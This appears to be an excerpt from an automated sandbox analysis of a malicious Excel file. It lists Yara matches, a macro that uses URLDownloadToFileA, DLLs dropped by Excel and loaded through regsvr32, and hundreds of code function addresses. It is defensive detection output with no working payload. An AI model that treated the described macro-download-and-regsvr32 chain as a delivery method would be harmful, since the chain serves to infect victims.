Source: Yara match File source: 8.2.regsvr32.exe.2010000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.regsvr32.exe.1d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.regsvr32.exe.2b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.regsvr32.exe.2b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.regsvr32.exe.1d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000A.00000002.1211898571.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.1210482177.00000000001D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.1211244100.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.940135302.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.939239138.0000000002010000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.1210480334.00000000002B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

System Summary

barindex
Source: 4470_02112022.xls Macro extractor: Sheet: Sheet6 contains: URLDownloadToFileA
Source: 4470_02112022.xls Macro extractor: Sheet: Sheet6 contains: URLDownloadToFileA
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\oxnv4.ooccxx Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\40hd04O0[1].dll Jump to dropped file
Source: 4470_02112022.xls Initial sample: EXEC
Source: 4470_02112022.xls Initial sample: EXEC
Source: C:\Windows\System32\regsvr32.exe File created: C:\Windows\system32\SnILCOTnpOOFucYhP\ Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_100073A4 8_2_100073A4
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_1003B0D0 8_2_1003B0D0
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_1004E0F0 8_2_1004E0F0
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_10044160 8_2_10044160
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_100491A0 8_2_100491A0
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_10048210 8_2_10048210
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_100102D4 8_2_100102D4
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_1004B340 8_2_1004B340
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_1001C3CC 8_2_1001C3CC
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_1003E540 8_2_1003E540
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_1003B5D0 8_2_1003B5D0
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_1003F650 8_2_1003F650
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_10031730 8_2_10031730
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_10044730 8_2_10044730
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_100547A0 8_2_100547A0
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_1003D830 8_2_1003D830
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_10034910 8_2_10034910
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_1002C9A8 8_2_1002C9A8
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_100449B0 8_2_100449B0
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_1004E9C0 8_2_1004E9C0
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_10048A10 8_2_10048A10
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_10031A60 8_2_10031A60
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_10018A70 8_2_10018A70
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_1003CC40 8_2_1003CC40
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_10025C50 8_2_10025C50
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_10027C6C 8_2_10027C6C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_10037CB0 8_2_10037CB0
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_10043CC0 8_2_10043CC0
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_10001CC8 8_2_10001CC8
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_10021CD0 8_2_10021CD0
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_10013CFC 8_2_10013CFC
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_10016D48 8_2_10016D48
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_10054D70 8_2_10054D70
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_1003DD80 8_2_1003DD80
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_10034DC0 8_2_10034DC0
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_1000FDC8 8_2_1000FDC8
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_10038DF0 8_2_10038DF0
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_10033EB0 8_2_10033EB0
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_1004EED0 8_2_1004EED0
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_10040FB0 8_2_10040FB0
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_1004BFF0 8_2_1004BFF0
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_001C0000 8_2_001C0000
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00000001800018F0 8_2_00000001800018F0
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180009AC0 8_2_0000000180009AC0
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180003B78 8_2_0000000180003B78
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00000001800143B4 8_2_00000001800143B4
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018002AC7C 8_2_000000018002AC7C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018000DC7C 8_2_000000018000DC7C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00000001800184BC 8_2_00000001800184BC
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018001A788 8_2_000000018001A788
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00000001800247AC 8_2_00000001800247AC
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018001D7F8 8_2_000000018001D7F8
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018000C800 8_2_000000018000C800
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018002B814 8_2_000000018002B814
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180017824 8_2_0000000180017824
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180003824 8_2_0000000180003824
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018002803C 8_2_000000018002803C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180023840 8_2_0000000180023840
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018001B058 8_2_000000018001B058
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018000D87C 8_2_000000018000D87C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00000001800098AC 8_2_00000001800098AC
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00000001800168B0 8_2_00000001800168B0
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00000001800078B4 8_2_00000001800078B4
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00000001800190BC 8_2_00000001800190BC
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018002B0C4 8_2_000000018002B0C4
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00000001800040EC 8_2_00000001800040EC
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00000001800288F8 8_2_00000001800288F8
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180021918 8_2_0000000180021918
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180004918 8_2_0000000180004918
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018000C930 8_2_000000018000C930
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180025938 8_2_0000000180025938
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018000F138 8_2_000000018000F138
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018000E93C 8_2_000000018000E93C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018001D150 8_2_000000018001D150
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180022158 8_2_0000000180022158
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180015958 8_2_0000000180015958
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018001A170 8_2_000000018001A170
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180003970 8_2_0000000180003970
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018001298D 8_2_000000018001298D
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180011194 8_2_0000000180011194
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180029198 8_2_0000000180029198
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018000A198 8_2_000000018000A198
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00000001800031C4 8_2_00000001800031C4
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018000C1E0 8_2_000000018000C1E0
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018000421C 8_2_000000018000421C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180023228 8_2_0000000180023228
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018001CA34 8_2_000000018001CA34
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018001DA34 8_2_000000018001DA34
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018001EA38 8_2_000000018001EA38
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018002B23C 8_2_000000018002B23C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018002A244 8_2_000000018002A244
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018000D250 8_2_000000018000D250
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180027A68 8_2_0000000180027A68
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180002A6C 8_2_0000000180002A6C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180014274 8_2_0000000180014274
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180012288 8_2_0000000180012288
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180012AA6 8_2_0000000180012AA6
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00000001800122C8 8_2_00000001800122C8
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00000001800072CC 8_2_00000001800072CC
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180006ADC 8_2_0000000180006ADC
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00000001800012F0 8_2_00000001800012F0
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018000FB04 8_2_000000018000FB04
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018001E30C 8_2_000000018001E30C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018001531C 8_2_000000018001531C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018000A31C 8_2_000000018000A31C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180004B50 8_2_0000000180004B50
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180029360 8_2_0000000180029360
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180017B68 8_2_0000000180017B68
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018002539C 8_2_000000018002539C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00000001800033A8 8_2_00000001800033A8
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00000001800233B0 8_2_00000001800233B0
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00000001800243B8 8_2_00000001800243B8
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180006BBC 8_2_0000000180006BBC
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018001FBD8 8_2_000000018001FBD8
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00000001800043F4 8_2_00000001800043F4
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018000C3F4 8_2_000000018000C3F4
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018001DC00 8_2_000000018001DC00
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018001EC08 8_2_000000018001EC08
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180007418 8_2_0000000180007418
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180025C1C 8_2_0000000180025C1C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018000A42C 8_2_000000018000A42C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018000E42C 8_2_000000018000E42C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180028C38 8_2_0000000180028C38
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180019C4C 8_2_0000000180019C4C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018000145C 8_2_000000018000145C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180002480 8_2_0000000180002480
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180020490 8_2_0000000180020490
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00000001800164B0 8_2_00000001800164B0
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180017CC0 8_2_0000000180017CC0
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180026CD0 8_2_0000000180026CD0
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018000BCD8 8_2_000000018000BCD8
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00000001800114E0 8_2_00000001800114E0
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00000001800154EC 8_2_00000001800154EC
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018001FD00 8_2_000000018001FD00
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018002A518 8_2_000000018002A518
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180020D20 8_2_0000000180020D20
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018001A524 8_2_000000018001A524
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018000D52C 8_2_000000018000D52C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180010D54 8_2_0000000180010D54
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180002D54 8_2_0000000180002D54
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018002B55C 8_2_000000018002B55C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180004D70 8_2_0000000180004D70
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180024D84 8_2_0000000180024D84
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018002358C 8_2_000000018002358C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180029590 8_2_0000000180029590
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180021594 8_2_0000000180021594
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018001D5B0 8_2_000000018001D5B0
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180027DB8 8_2_0000000180027DB8
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018001B5C4 8_2_000000018001B5C4
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018001FDF4 8_2_000000018001FDF4
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018000F60C 8_2_000000018000F60C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018001E61C 8_2_000000018001E61C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180007620 8_2_0000000180007620
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018000BE20 8_2_000000018000BE20
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018001DE2C 8_2_000000018001DE2C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180023E4C 8_2_0000000180023E4C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180001650 8_2_0000000180001650
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018002765C 8_2_000000018002765C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018000EE5C 8_2_000000018000EE5C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180015E70 8_2_0000000180015E70
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180017E74 8_2_0000000180017E74
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018000FE84 8_2_000000018000FE84
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00000001800056BC 8_2_00000001800056BC
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018002B6C0 8_2_000000018002B6C0
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018001C6CC 8_2_000000018001C6CC
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180020ED4 8_2_0000000180020ED4
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00000001800116DC 8_2_00000001800116DC
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00000001800166E8 8_2_00000001800166E8
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00000001800036FC 8_2_00000001800036FC
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018000D704 8_2_000000018000D704
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180015714 8_2_0000000180015714
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018000E720 8_2_000000018000E720
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180024F30 8_2_0000000180024F30
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180001744 8_2_0000000180001744
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180018764 8_2_0000000180018764
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180028768 8_2_0000000180028768
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180010F74 8_2_0000000180010F74
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180018F80 8_2_0000000180018F80
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018002A784 8_2_000000018002A784
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180016F84 8_2_0000000180016F84
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00000001800027B8 8_2_00000001800027B8
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180026FBC 8_2_0000000180026FBC
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180012FC8 8_2_0000000180012FC8
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018001FFD8 8_2_000000018001FFD8
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00000001800117E0 8_2_00000001800117E0
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_002F0000 9_2_002F0000
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_0000000180025C1C 9_2_0000000180025C1C
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_0000000180019C4C 9_2_0000000180019C4C
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_0000000180006251 9_2_0000000180006251
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_0000000180015E70 9_2_0000000180015E70
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000000018000DC7C 9_2_000000018000DC7C
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_0000000180008688 9_2_0000000180008688
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_00000001800078B4 9_2_00000001800078B4
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_00000001800018F0 9_2_00000001800018F0
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_00000001800132FC 9_2_00000001800132FC
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_0000000180009D2C 9_2_0000000180009D2C
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_0000000180022334 9_2_0000000180022334
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_0000000180002D54 9_2_0000000180002D54
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_0000000180003B78 9_2_0000000180003B78
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000000018001A788 9_2_000000018001A788
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000000018000599B 9_2_000000018000599B
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000000018001D5B0 9_2_000000018001D5B0
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_00000001800143B4 9_2_00000001800143B4
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000000018001FDF4 9_2_000000018001FDF4
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_00000001800043F4 9_2_00000001800043F4
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000000018000C3F4 9_2_000000018000C3F4
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000000018001D7F8 9_2_000000018001D7F8
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000000018001DC00 9_2_000000018001DC00
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000000018000C800 9_2_000000018000C800
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000000018001EC08 9_2_000000018001EC08
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000000018000F60C 9_2_000000018000F60C
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000000018002B814 9_2_000000018002B814
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_0000000180007418 9_2_0000000180007418
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000000018001E61C 9_2_000000018001E61C
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000000018000421C 9_2_000000018000421C
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_0000000180007620 9_2_0000000180007620
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000000018000BE20 9_2_000000018000BE20
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_0000000180017824 9_2_0000000180017824
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_0000000180003824 9_2_0000000180003824
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_0000000180023228 9_2_0000000180023228
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_0000000180010628 9_2_0000000180010628
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000000018001DE2C 9_2_000000018001DE2C
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000000018000A42C 9_2_000000018000A42C
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000000018000E42C 9_2_000000018000E42C
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000000018001CA34 9_2_000000018001CA34
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000000018001DA34 9_2_000000018001DA34
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_0000000180028C38 9_2_0000000180028C38
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000000018001EA38 9_2_000000018001EA38
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000000018002803C 9_2_000000018002803C
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000000018002B23C 9_2_000000018002B23C
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_0000000180011C3C 9_2_0000000180011C3C
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_0000000180023840 9_2_0000000180023840
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000000018002A244 9_2_000000018002A244
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_0000000180027448 9_2_0000000180027448
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_0000000180023E4C 9_2_0000000180023E4C
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_0000000180001650 9_2_0000000180001650
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000000018000D250 9_2_000000018000D250
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000000018001B058 9_2_000000018001B058
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000000018002765C 9_2_000000018002765C
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000000018000145C 9_2_000000018000145C
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000000018000EE5C 9_2_000000018000EE5C
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_0000000180013A60 9_2_0000000180013A60
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_0000000180027A68 9_2_0000000180027A68
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_0000000180002A6C 9_2_0000000180002A6C
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000000018002AA74 9_2_000000018002AA74
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_0000000180014274 9_2_0000000180014274
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_0000000180017E74 9_2_0000000180017E74
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000000018002AC7C 9_2_000000018002AC7C
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000000018000D87C 9_2_000000018000D87C
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_0000000180002480 9_2_0000000180002480
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000000018000FE84 9_2_000000018000FE84
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_0000000180020490 9_2_0000000180020490
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_0000000180029094 9_2_0000000180029094
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_00000001800098AC 9_2_00000001800098AC
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_00000001800164B0 9_2_00000001800164B0
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_00000001800168B0 9_2_00000001800168B0
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_0000000180026AB8 9_2_0000000180026AB8
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_00000001800184BC 9_2_00000001800184BC
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_00000001800190BC 9_2_00000001800190BC
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_00000001800056BC 9_2_00000001800056BC
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000000018002B6C0 9_2_000000018002B6C0
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_0000000180017CC0 9_2_0000000180017CC0
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_0000000180009AC0 9_2_0000000180009AC0
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000000018002B0C4 9_2_000000018002B0C4
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000000018001C6CC 9_2_000000018001C6CC
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_00000001800072CC 9_2_00000001800072CC
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_0000000180026CD0 9_2_0000000180026CD0
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_0000000180020ED4 9_2_0000000180020ED4
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000000018000BCD8 9_2_000000018000BCD8
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_00000001800116DC 9_2_00000001800116DC
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_0000000180006ADC 9_2_0000000180006ADC
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_00000001800114E0 9_2_00000001800114E0
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_00000001800166E8 9_2_00000001800166E8
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_00000001800154EC 9_2_00000001800154EC
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_00000001800040EC 9_2_00000001800040EC
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_00000001800012F0 9_2_00000001800012F0
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_00000001800288F8 9_2_00000001800288F8
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_00000001800036FC 9_2_00000001800036FC
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000000018001FD00 9_2_000000018001FD00
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000000018000D704 9_2_000000018000D704
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000000018000FB04 9_2_000000018000FB04
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000000018001E30C 9_2_000000018001E30C
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_0000000180015714 9_2_0000000180015714
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000000018002A518 9_2_000000018002A518
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_0000000180021918 9_2_0000000180021918
